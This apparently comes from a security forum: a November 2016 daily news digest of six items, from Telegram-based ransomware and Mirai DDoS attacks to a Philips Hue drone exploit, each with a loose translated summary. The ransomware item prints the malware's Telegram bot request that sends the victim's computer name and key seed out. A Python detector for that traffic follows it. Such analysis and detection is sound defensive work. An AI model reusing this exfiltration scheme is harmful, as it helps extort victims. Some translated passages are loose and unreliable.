Daily Security Briefing (20161111)

Posted 2016-11-10 21:53
Posted 2016-11-11 14:19
1. Researchers discover the first malware to exploit the Telegram protocol
Title: The first cryptor to exploit Telegram

Author info: November 8, 2016. 10:52 am By Anton Ivanov, Fedor Sinitsyn

//BEGIN
Earlier this month, we discovered a piece of encryption malware targeting Russian users. One of its peculiarities was that it uses Telegram Messenger’s communication protocol to send a decryption key to the threat actor. To our knowledge, this is the first cryptor to use the Telegram protocol in an encryption malware case.
What is a cryptor?
In general, cryptors can be classified into two groups: those which maintain offline encryption and those which don’t.
There are several reasons why file encryption malware requires an Internet connection. For instance, the threat actors may send an encryption key to the cryptor and receive data from it which they can later use to decrypt the victim’s encrypted files.
Obviously, a special service is required on the threat actor’s side to receive data from the cryptor malware. That service must be protected from third-party researchers, and this creates extra software development costs.
Russian instant-messaging users have once again been the first to taste something new: their commonly used chat tool Telegram Messenger has been turned into a tool and channel for extorting users. This month, Kaspersky security researchers for the first time discovered malicious code that uses the communication protocol of the open-source Telegram Messenger to transmit encryption keys.
Cryptors generally fall into two kinds: online and offline. The malicious code currently in circulation prefers the online encryption approach.

//END
Analyzing the Telegram Trojan
The Telegram Trojan is written in Delphi and is over 3MB in size. After launching, it generates a file encryption key and an infection ID (infection_id).
Then it contacts the threat actors using the publicly available Telegram Bot API and operates as a Telegram bot, using the public API to communicate with its creators.
In order for that to happen, the cybercriminals first create a “Telegram bot”. A unique token from the Telegram servers identifies the newly-created bot and is placed into the Trojan’s body so it can use the Telegram API.
The Trojan then sends a request to the URL https://api.telegram.org/bot<token>/GetMe, where <token> is the unique ID of the Telegram bot created by the cybercriminals. According to the official API documentation, the method ‘getMe’ helps to check if a bot with the specified token exists and finds out basic information about it. The Trojan does not use the information about the bot that the server returns.
The Trojan sends the next request using the method ‘sendMessage’ which allows the bot to send messages to the chat thread of the specified number. The Trojan then uses the chat number hardwired into its body, and sends an “infection successful” report to its creators:
https://api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>
The Trojan sends the following parameters in the request:
<chat> – number of the chat with the cybercriminal;
<computer_name> – name of the infected computer;
<infection_id> – infection ID;
<key_seed> – number used as a basis to generate the file encryption key.
After sending the information, the Trojan searches the hard drives for files with specific extensions, and encrypts them bytewise, using the simple algorithm of adding each file byte to the key bytes.
This ransomware Trojan is written in Delphi and is 3MB in size. Once launched, it generates a unique password for encrypting files and an infection ID password: token. The Trojan then contacts its author through Telegram Messenger's public API interface, and uses this infection ID password to identify the infected user. The files chosen for encryption are document files that may be of value to the user; the 11 document types are doc, docx, xls, xlsx, jpg, jpeg, png, dt, dbf, cd and pdf. The encryption method processes the file byte by byte, which of course is simply adding a secret number to each individual byte of the original file.

Comment: Although Telegram Messenger claims to be one of the most secure instant messaging tools, it is precisely its open-source nature that lets ransomware exploit it, by setting up bot sites, to defraud users.
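As an added illustration of the check-in traffic described in this post (not code from the article or from Kaspersky): a small Python detector that scans constructed proxy-log lines for the two Telegram Bot API calls the Trojan makes and pulls the computer name, infection ID and key seed out of the sendMessage report text. The log lines, bot token and chat id are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample proxy log (not from the article): "timestamp client method url".
# The bot token and chat id are made-up placeholders.
SAMPLE_LOG = """\
2016-11-08T10:52:01Z 10.0.0.15 GET https://api.telegram.org/bot123456:ABCDEFfakeTOKEN/GetMe
2016-11-08T10:52:02Z 10.0.0.15 GET https://api.telegram.org/bot123456:ABCDEFfakeTOKEN/sendmessage?chat_id=987654&text=WS-ACCT-07_3f9a1c_48213
2016-11-08T10:53:10Z 10.0.0.22 GET https://www.example.com/index.html
"""

# The two Bot API calls the article describes. The method is matched case-insensitively
# because the Trojan's URL uses "sendmessage" while the documented method is "sendMessage".
BOT_API_RE = re.compile(
    r"^https://api\.telegram\.org/bot(?P<token>[^/]+)/(?P<method>getme|sendmessage)\b", re.I)
# Report format from the article: <computer_name>_<infection_id>_<key_seed>
# (greedy first group lets the computer name itself contain underscores).
REPORT_RE = re.compile(r"^(?P<computer_name>.+)_(?P<infection_id>[^_]+)_(?P<key_seed>\d+)$")


def parse_line(line):
    """Return a hit dict for a Telegram Bot API request, or None for anything else."""
    ts, client, _method, url = line.split(maxsplit=3)
    m = BOT_API_RE.match(url)
    if not m:
        return None
    hit = {"ts": ts, "client": client, "method": m.group("method").lower(),
           # keep only a prefix of the bot token so the full secret never lands in an alert
           "token_redacted": m.group("token")[:6] + "...", "report": None}
    if hit["method"] == "sendmessage":
        qs = parse_qs(urlsplit(url).query)
        text = qs.get("text", [""])[0]
        r = REPORT_RE.match(text)
        if r:  # decode the "infection successful" report into its three fields
            hit["report"] = {"chat_id": qs.get("chat_id", [""])[0], **r.groupdict()}
    return hit


def find_telegram_c2(log):
    """Scan a whole log and return every Bot API hit in order."""
    return [h for h in (parse_line(l) for l in log.splitlines() if l.strip()) if h]


if __name__ == "__main__":
    for hit in find_telegram_c2(SAMPLE_LOG):
        print(hit)
```

Any host in an enterprise proxy log talking to api.telegram.org/bot... without a sanctioned reason is worth a look on its own; the report fields just make triage faster.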

Posted 2016-11-11 14:20
2. Mirai malware revealed to have been used in attacks on US candidates' websites
Title: Mirai malware was used in attacks on US candidates' sites

Author info: 2016-11-09 By Anthony Spadafora

//BEGIN
The security firm Flashpoint has revealed that the Mirai malware was used in attacks which aimed to take down the sites of candidates ahead of the US presidential election.
Leading up to the US presidential election, hackers did try to take down the campaign sites of Hillary Clinton and Donald Trump using the Mirai malware, ultimately being unsuccessful.
Security firm Flashpoint has revealed that four separate 30-second HTTP Layer 7 attacks were launched against the websites of both opponents between 6-7 November. Due to the fact that more hackers have begun to utilise the Mirai botnet, none of the attacks were able to bring either site offline.
Researchers at a security company say that before this year's US presidential election, the candidates' websites were hit by DDoS attacks from the Mirai ("future") IoT malicious code, specifically the websites of the two presidential candidates Hillary Clinton and Donald Trump,
though in the end the attacks simply did not succeed. Between the 6th and 7th of this month, researchers also found four separate 30-second Layer 7 HTTP attacks; because the Mirai botnet has become known to more hackers, it is still rather hard for them to achieve their goal.

//END
When the source code for the Mirai malware was released online it appeared as though it would give cybercriminals an edge when it came to launching large-scale DDoS attacks. Now though, the opposite appears to be true as they have all begun to compete for connected devices to aid in their attacks.
Although the leak of Mirai's source code has let more hackers exploit those compromised IoT devices, the real situation is not as bad as imagined. The reason is that competition for control of a fixed number of compromised IoT devices has triggered fights among the hackers, so the actual attack traffic in the end was not as huge as imagined.

Comment: Mirai continues....

Posted 2016-11-11 14:23
3. Yahoo reveals more details about the massive hack it suffered
Title: Yahoo Reveals More Details About Massive Hack

Author info: November 10, 2016 By AFP

//BEGIN
Yahoo provided more details on Wednesday about an epic hack of its services, including that the culprits may have planted software "cookies" for ongoing access to users' accounts.
In revelations that could jeopardize the company's pending $4.8 billion acquisition by US telecom giant Verizon, the internet pioneer said it was trying to pin down when it first knew its system had been breached and whether hackers gave themselves a way to get back into accounts whenever they wished.
YAHOO, the long-established internet company whose breach exposed the email accounts of 500 million users, provided more details this Wednesday explaining how hackers used cookies to steal user account information. The disclosure has affected the telecom giant's acquisition of YAHOO; telecom giant VERIZON had originally intended to acquire YAHOO for US$4.8 billion. To let the public know more details, the former internet giant YAHOO is preparing to disclose when it learned that its information had been massively leaked in 2014, and whether hackers could freely enter users' mailboxes.

//END
A Verizon executive overseeing the purchase of Yahoo said last month that the deal was moving ahead pending the outcome of an investigation into the hack.
"We are not going to jump off a cliff blindly, but strategically the deal still does make sense to us," Verizon executive vice president Marni Walden said at a technology conference in California.
"What we have to be careful about is what we don't know." He declined to comment on what information or circumstances might cause Verizon to walk away from the deal inked in July.
The company said earlier this month that the breach affecting Yahoo customers could have a "material" effect on the acquisition. Yahoo also warned of the possibility in its filing.
The use of the term "material" suggests a substantive change in Yahoo's value that was not previously known, and which could allow the telecom group to lower its offer or scrap the deal.
The telecom's acquisition executives have paused until the matter is clarified. "Although we will act cautiously, the company still believes acquiring YAHOO makes strategic sense," a VERIZON vice president said at a conference. "What we care more about is what else there is that we didn't know before." He declined to comment on exactly what caused VERIZON to pause follow-up actions on the YAHOO acquisition in July this year. But the leak incident is very likely to lead to a lower acquisition price.

Comment: Having once seen the great sea, ordinary waters no longer impress.

Posted 2016-11-11 14:25
4. Researchers use a drone to remotely control Philips smart bulbs
{CHN}
Title: Researchers use a drone to remotely control Philips smart bulbs

Author info: 2016-11-09 20:39 Wednesday By pigsrollaroundinthem

//BEGIN
Researchers used a drone to remotely control part of a Philips Hue smart lighting system. The researchers exploited a vulnerability in the ZigBee Light Link Touchlink system. ZigBee issued a statement saying the vulnerability is unrelated to the ZigBee protocol itself and instead lies in the vendor's protocol implementation. Using the vulnerability, the researchers were able to bypass protections that forbid remote network access, install malicious firmware, and make the lighting system blink out S-O-S in Morse code. The researchers could even block future wireless updates, making the infection irreversible. Apart from taking the lighting system apart, there is no other way to reprogram an infected device. Philips released a patch fixing the vulnerability last month.

//END
Researchers hack Philips Hue smart bulbs from the sky
Send in the drones.
Ian Paul | @ianpaul
Contributor, TechHive Nov 7, 2016 8:36 AM
Security researchers in Canada and Israel have discovered a way to take over the Internet of Things (IoT) from the sky.

Okay, that’s a little dramatic, but the researchers were able to take control of some Philips Hue lights using a drone. Based on an exploit for the ZigBee Light Link Touchlink system, white hat hackers were able to remotely control the Hue lights via drone and cause them to blink S-O-S in Morse code.
The drone carried out the attack from more than a thousand feet away. Using the exploit, the researchers were able to bypass any prohibitions against remote access of the networked light bulbs, and then install malicious firmware. At that point the researchers were able to block further wireless updates, which apparently made the infection irreversible.
“There is no other method of reprogramming these [infected] devices without full disassemble (which is not feasible). Any old stock would also need to be recalled, as any devices with vulnerable firmware can be infected as soon as power is applied,” according to the researchers.
The researchers notified Philips of the vulnerability. The company then delivered a patch for it in October, according to The New York Times.
Why this matters: The ability to attack Philips Hue lighting doesn’t sound all that menacing and more of an inconvenience than anything else. The obvious exception to that would be using the lights to trigger epileptic seizures in vulnerable people, or plunging properties into darkness.
Shedding light on a deeper issue
The bigger issue is that security researchers worry exploits like these could be used to infect devices with a computer worm. That worm could then move on to attack other IoT devices on the same network. The researchers argue this kind of attack could be used to take over a building or an area with a high concentration of connected devices within minutes. All the hacker would have to do is hover over a building with a drone or drive past an area with a computer searching for vulnerable devices.
Taking over massive numbers of IoT devices may sound like alarmist nonsense, but it’s really not that hard to believe. Just a few weeks ago, an IoT botnet was responsible, at least in part, for the major DDoS attack that caused disruptions to U.S. Internet traffic.
Over the past few months, it’s become increasingly clear that while we may be ready to put networked light bulbs, thermostats, and door locks on our homes, the security for many of these devices is still sub-optimal.
http://www.pcworld.com/article/3 ... s-from-the-sky.html
These researchers come from two countries, Canada and Israel; the Philips bulbs here are IoT devices similar to the Mirai-infected cameras. The drone attack can be launched against the bulbs from 1000 feet away. The researchers recommend that the manufacturer recall all related IoT bulbs and re-patch them, because once they enter the market, recalling them becomes even more troublesome and difficult.
According to The New York Times, Philips, the company involved, fixed the vulnerability in October 2016.

Comment: So Mirai ("future") is not the only IoT-infecting malware; there may be even more in the future.

Posted 2016-11-11 14:28
5. Security vendor releases Q3 spam and phishing report
Title: Spam and phishing in Q3 2016

Author info: November 9, 2016. 10:00 am By Darya Gudkova, Maria Vergelis, Nadezhda Demidova

//BEGIN
Spam: quarterly highlights

Malicious spam

Throughout 2016 we have registered a huge amount of spam with malicious attachments; in the third quarter, this figure once again increased significantly. According to KSN data, in Q3 2016 the number of email antivirus detections totaled 73,066,751. Most malicious attachments contained Trojan downloaders that one way or another loaded ransomware onto the victim’s computer.
The Q3 2016 spam report shows that a great deal of malicious code enters users' computers along with spam. In the third quarter alone, spam containing malicious code exceeded 73 million messages. Most of the Trojans in these malicious attachments are related to ransomware.

//END
Conclusion

In the third quarter of 2016, the proportion of spam in email traffic increased by 2 p.p. compared to the previous quarter and accounted for 59.19%. The largest percentage of spam – 61.25% – was registered in September. India (14.02%), which was only fourth in the previous quarter, became the biggest source of spam. The top three sources also included Vietnam (11.01%) and the US (8.88%).
The top three countries targeted by malicious mailshots remained unchanged from the previous quarter. Germany (13.21%) came first again, followed by Japan (8.76%) and China (8.37%).
In Q3 2016, Kaspersky Lab products prevented over 37.5 million attempts to enter phishing sites, which is 5.2 million more than the previous quarter. Financial organizations were the main target, with banks the worst affected, accounting for 27.13% of all registered attacks. The most attractive phishing targets in Q3 2016 were clients of four banks located in Brazil.
The conclusion is that in Q3 2016 the proportion of spam in all email increased by 2% over the previous quarter to nearly 60%, with September the highest month at over 60%. India, only fourth last quarter, ranked first this quarter at over 14%. The top three also included Vietnam and the US. The ranking of countries targeted by malicious code in email was unchanged from last month: Germany, Japan and China in that order. By website type, online banking was the hardest hit; among online-banking phishing, Brazil accounted for the largest share.

//Download: Spam-report_Q3-2016_final_ENG.pdf (3.43 MB, downloads: 32)
Filename: Spam-report_Q3-2016_final_ENG.pdf
File size: 3,593,298 bytes
MD5: EFA18058696D263095C50CE60C460296

Comment: Ransomware + in action....

Posted 2016-11-11 14:30
6. Researchers find that iOS WebView can be abused to make phone calls
Title: Hackers Can Abuse iOS WebView to Make Phone Calls

Author info: November 10, 2016 By Eduard Kovacs

//BEGIN
The iOS applications of Twitter, LinkedIn and possibly other major vendors can be abused by hackers to initiate phone calls to arbitrary numbers. The attacker can also prevent the victim from ending the call.
Security researcher Collin Mulliner said the cause of the flaw is related to WebView and how the component is handled by some iOS applications. WebView is a browser integrated into mobile apps. It allows developers to build their apps with web technologies, and it’s often used to display web pages inside an application without the need for third-party browsers.
Security researchers found that iOS applications have a WebView vulnerability; using it, hackers can dial arbitrary phone numbers and arrange things so the user cannot end the call. The vulnerable iOS apps include many well-known applications such as Twitter and LinkedIn. WebView is a browser embedded in mobile applications; with it developers can build their own apps, and it is usually used to display some web pages without needing the support of a third-party browser.

//END

Mulliner started investigating the issue after hearing the story of an 18-year-old teen from Arizona who used a similar exploit to “prank” his friends. However, the teen ended up being arrested because he unknowingly used an exploit designed to trigger calls to 911, causing disruptions to emergency services in his area.
Mulliner provided other examples of serious attacks that can be carried out using this type of exploit.
“DoSing 911 is pretty terrible but there are other examples such as expensive 900 numbers where the attacker can actually make money. A stalker can make his victim dial his phone number so he gets his victim's number. Altogether things you don't want to happen,” he said.
An 18-year-old young man was arrested for showing off his discovery of this vulnerability and using it to dial 911. Of course it is not only 911; it can also be used to dial expensive 900 numbers and profit from them. A more malicious actor can make the victim dial a phone number and thereby automatically learn the other party's number, and with a phone number a great deal can be done afterwards.

Comment: That a component for browsing web pages can be used to make phone calls, and the user can't even hang up, is still a bit strange.....